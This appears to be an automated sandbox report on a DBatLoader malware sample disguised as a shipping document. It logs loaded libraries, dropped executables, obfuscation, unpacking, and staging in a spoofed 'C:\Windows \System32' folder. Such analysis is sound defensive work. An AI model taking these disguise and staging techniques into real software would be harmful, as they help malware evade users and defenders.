Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

File opened: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.cfg

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\xkn.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows \System32\per.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Static file information: File size 1050624 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe,
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: easinvoker.pdbH source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 000
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\glrkszlG.pif

Unpacked PE file: 1.2.glrkszlG.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;

Yara detected DBatLoader

Source: Yara match	File source: 39.2.Glzskrlg.PIF.2a20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.2a20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1859693106.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Binary contains a suspicious time stamp

Source: glrkszlG.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

0_2_279567B9

PE file contains sections with non-standard names

Source: alpha.exe.4.dr	Static PE information: section name: .didat
Source: per.exe.12.dr	Static PE information: section name: .imrsiv

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40102806 push ecx; ret	0_2_40102819
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx	0_2_028BD2E9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA2FC push 028CA367h; ret	0_2_028CA35F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A32FC push eax; ret	0_2_028A3338
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA2F5 push 028CA367h; ret	0_2_028CA35F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A635A push 028A63B7h; ret	0_2_028A63AF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A635C push 028A63B7h; ret	0_2_028A63AF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA0AC push 028CA125h; ret	0_2_028CA11D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA1F8 push 028CA288h; ret	0_2_028CA280
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA144 push 028CA1ECh; ret	0_2_028CA1E4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A6748 push 028A678Ah; ret	0_2_028A6782
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A6746 push 028A678Ah; ret	0_2_028A6782
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028AC4FC push ecx; mov dword ptr [esp], edx	0_2_028AC501
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028AD530 push 028AD55Ch; ret	0_2_028AD554
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028ACB7C push 028ACD02h; ret	0_2_028ACCFA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B789C push 028B7919h; ret	0_2_028B7911
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028AC8AA push 028ACD02h; ret	0_2_028ACCFA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B68D8 push 028B6983h; ret	0_2_028B697B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B68D6 push 028B6983h; ret	0_2_028B697B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028C9874 push 028C9A60h; ret	0_2_028C9A58
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B9EBB push 028B9EF4h; ret	0_2_028B9EEC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B9EBC push 028B9EF4h; ret	0_2_028B9EEC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B2EF0 push 028B2F66h; ret	0_2_028B2F5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B5E0C push ecx; mov dword ptr [esp], edx	0_2_028B5E0E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B2FFB push 028B3049h; ret	0_2_028B3041
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B2FFC push 028B3049h; ret	0_2_028B3041
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7F18 push 028B7F50h; ret	0_2_028B7F48
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7C7C push 028B7CBEh; ret	0_2_028B7CB6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279787DE push dword ptr [ebx]; iretd	0_2_279787E1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27974E56 push ecx; ret	0_2_27974E69
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2798DD28 push esp; retf	0_2_2798DD30

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File created: C:\Users\Public\Libraries\glrkszlG.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Glzskrlg.PIF			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\per.exe

Jump to behavior

Drops PE files

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File created: C:\Users\Public\Libraries\glrkszlG.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Glzskrlg.PIF	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
